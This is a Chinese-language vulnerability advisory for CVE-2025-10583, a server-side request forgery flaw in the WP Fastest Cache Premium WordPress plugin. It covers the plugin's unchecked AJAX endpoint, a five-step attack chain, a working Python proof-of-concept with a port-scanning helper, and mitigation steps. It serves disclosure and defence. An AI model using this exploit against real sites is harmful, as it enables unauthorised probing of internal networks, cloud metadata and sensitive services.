CVE-2025-10583 WordPress WP Fastest Cache Premium插件服务器端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-10583

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WP Fastest Cache Premium (WordPress插件)

漏洞概述

CVE-2025-10583是WordPress网站缓存插件WP Fastest Cache Premium中的一个服务器端请求伪造（SSRF）安全漏洞。该漏洞存在于插件的AJAX处理功能中，具体涉及get_server_time_ajax_request操作。由于插件在处理该AJAX请求时未对用户提供的URL参数进行充分的验证和过滤，导致具有Subscriber（订阅者）级别权限及以上的认证攻击者可以迫使服务器向任意指定的内部或外部地址发起HTTP请求。此漏洞的危险性在于它可以绕过网络边界防护，访问本不应该暴露的内部服务、读取云平台元数据（如AWS元数据服务169.254.169.254）、探测内网结构以及获取敏感信息。攻击者利用此漏洞可以探测内网端口、访问内部管理后台、甚至通过SSRF配合其他漏洞实现进一步的攻击。值得注意的是，该插件的免费版本（WP Fastest Cache）不受此漏洞影响，仅Premium（高级版）版本存在此安全问题。漏洞于2025年12月12日由Wordfence安全团队披露，CVSS评分3.5，属于低危级别，但仍然建议用户及时更新到修复版本。

技术细节

WP Fastest Cache Premium插件在实现服务器时间同步功能时，暴露了一个名为get_server_time_ajax_request的AJAX端点。该端点允许认证用户（订阅者级别及以上）提交任意URL地址，服务器随后会向该地址发起HTTP请求以获取服务器时间信息。问题在于插件直接使用用户输入的URL参数而未进行任何安全校验，包括：1）未验证URL的合法性，未限制只能访问特定的白名单域名；2）未阻止对内网IP地址的访问请求，如127.0.0.1、10.0.0.0/8、172.16.0.0/12、192.168.0.0/16等私有地址段；3）未禁止对云平台元数据端点的访问；4）未对请求目标端口进行限制。攻击者可以通过构造恶意请求包，将目标URL指向内网服务地址，利用服务器的IP地址发起请求，从而实现端口扫描、内网服务探测、读取敏感响应内容等操作。这种攻击方式完全利用了受害服务器的公网IP作为跳板，有效规避了直接针对内网的访问限制。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress网站的订阅者级别账户或通过其他方式获取有效的认证会话cookie

STEP 2

步骤2

攻击者构造恶意AJAX请求，指定action参数为get_server_time_ajax_request，并在url参数中填入内部服务地址

STEP 3

步骤3

服务器接收到请求后，由于插件未对url参数进行安全校验，直接向攻击者指定的内部地址发起HTTP请求

STEP 4

步骤4

攻击者通过分析响应内容，探测内网服务开放状态、获取敏感信息或利用内部服务漏洞进行进一步攻击

STEP 5

步骤5

如需横向移动，攻击者可利用SSRF探测到的内网信息，结合其他漏洞实现权限提升或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-10583 PoC - WP Fastest Cache Premium SSRF Vulnerability
# Target: WordPress site with WP Fastest Cache Premium <= 1.7.4

def exploit_ssrf(target_url, wp_path='/', target_internal_host='127.0.0.1', target_port=80):
    """
    Exploit SSRF in WP Fastest Cache Premium's get_server_time_ajax_request AJAX action
    
    Args:
        target_url: Target WordPress site URL
        wp_path: WordPress installation path
        target_internal_host: Internal host to target (default: 127.0.0.1)
        target_port: Internal port to target (default: 80)
    """
    
    # Construct the AJAX endpoint URL
    ajax_url = f"{target_url.rstrip('/')}{wp_path.lstrip('/')}wp-admin/admin-ajax.php"
    
    # Construct SSRF payload targeting internal service
    # Using http:// scheme to force HTTP request to internal host
    ssrf_url = f"http://{target_internal_host}:{target_port}"
    
    # Prepare POST data
    data = {
        'action': 'get_server_time_ajax_request',
        'url': ssrf_url  # SSRF payload - attacker controlled URL
    }
    
    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}")
    print(f"[*] SSRF Target: {ssrf_url}")
    
    try:
        # Send request with subscriber-level authentication
        # Note: Requires valid subscriber session cookie
        response = requests.post(ajax_url, data=data, timeout=10, verify=False)
        
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)} bytes")
        
        if response.status_code == 200:
            print("[+] Request successful - SSRF vulnerability confirmed")
            print(f"[>] Response snippet: {response.text[:200]}...")
            return True
        else:
            print("[-] Request failed")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

def scan_internal_port(target_url, internal_host, port):
    """Scan internal port via SSRF"""
    return exploit_ssrf(target_url, '/', internal_host, port)

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url> [internal_host] [port]")
        print(f"Example: python {sys.argv[0]} https://example.com 127.0.0.1 8080")
        sys.exit(1)
    
    target = sys.argv[1]
    host = sys.argv[2] if len(sys.argv) > 2 else '127.0.0.1'
    port = int(sys.argv[3]) if len(sys.argv) > 3 else 80
    
    exploit_ssrf(target, '/', host, port)

影响范围

WP Fastest Cache Premium <= 1.7.4

防御指南

临时缓解措施

如果无法立即更新插件，可采取以下临时缓解措施：1）暂时禁用WP Fastest Cache Premium插件，使用WordPress内置缓存或其他可信缓存插件替代；2）通过.htaccess或Nginx配置限制对admin-ajax.php的访问，禁用未授权用户的AJAX请求；3）使用防火墙规则阻止对内网私有地址段的出站请求；4）如果业务允许，考虑降级到不受影响的免费版本WP Fastest Cache；5）加强WordPress用户权限管理，审查并清理不必要的订阅者账户。